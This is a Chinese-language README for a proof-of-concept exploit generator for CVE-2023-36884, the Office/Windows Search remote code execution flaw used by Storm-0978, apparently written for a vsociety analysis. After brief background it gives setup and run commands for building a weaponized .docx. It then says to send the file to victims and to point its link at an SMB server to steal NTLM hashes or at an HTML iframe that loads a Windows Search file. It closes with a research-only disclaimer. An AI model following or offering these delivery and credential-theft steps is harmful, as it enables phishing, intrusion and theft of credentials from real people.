2023年7月11日,微软发布了一个补丁,旨在解决多个正在被积极利用的远程代码执行(RCE)漏洞。此次行动还揭露了一场由名为 Storm-0978 的威胁行为者策划的网络钓鱼攻击活动,该活动专门针对欧洲和北美的组织。这场攻击活动的核心是一个被指定为 CVE-2023-36884 的零日漏洞,该漏洞允许攻击者通过精心构造的 Office Open XML(OOXML)文档利用 Windows 搜索文件,这些文档带有与乌克兰世界大会(UWC)相关的地缘政治诱饵。虽然最初曾提出一种缓解该漏洞的变通方案,但微软于2023年8月8日发布了 Office 纵深防御更新,有效打破了通过 Windows 搜索(*.search-ms)文件实现 RCE 的利用链。
此漏洞利用脚本是为 vsociety 上的 CVE 分析而编写的。
安装 PIP 包:
pip install python-docx pywin32
创建一个 example.html 文件并启动 Python HTTP Web 服务器:
New-Item -Path "example.html" - ItemType File
python -m http.server 8888
然后,运行脚本:
python gen_docx_with_rtf_altchunk.py merged.docx autolinked.rtf http://localhost:8888/example.html
现在,生成的文件可以通过电子邮件或其他方式与受害者共享。链接可以指向你的 SMB 服务器以窃取受害者的 NTLM 哈希,或指向一个包含 iframe 的 HTML 文件,该 iframe 引用了 Windows 搜索文件,就像原始恶意软件中一样。由于缺乏更多信息,无法展示确切的利用过程。
此漏洞利用脚本仅出于研究和开发有效防御技术的目的而创建,不旨在用于任何恶意或未经授权的活动。脚本的作者和所有者对因使用本软件而造成的任何误用或损害不承担任何责任。请用户负责任地使用本软件,并仅依照适用的法律法规行事。请负责任地使用。